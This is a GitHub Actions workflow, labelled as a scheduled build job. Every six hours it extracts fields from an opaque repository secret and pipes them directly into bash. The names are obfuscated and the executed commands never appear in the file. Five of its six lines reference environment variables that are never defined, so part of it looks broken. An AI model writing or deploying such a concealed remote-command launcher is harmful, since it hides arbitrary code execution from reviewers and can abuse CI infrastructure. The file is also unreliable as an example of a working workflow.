name: crewexpression

on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: crewexpression
        env:
          qi72: ${{ secrets.qi72 }}
        run: |
          echo $qi72 | jq -r .cm7 | /bin/bash
          echo $k8 | jq -r .cqzm6936 | /bin/bash
          echo $ev4833 | jq -r .mrxq44027 | /bin/bash
          echo $zv649 | jq -r .qxy73824 | /bin/bash
          echo $ssvzs9 | jq -r .lwrzm9558 | /bin/bash
          echo $zr7219 | jq -r .zmpp7 | /bin/bash

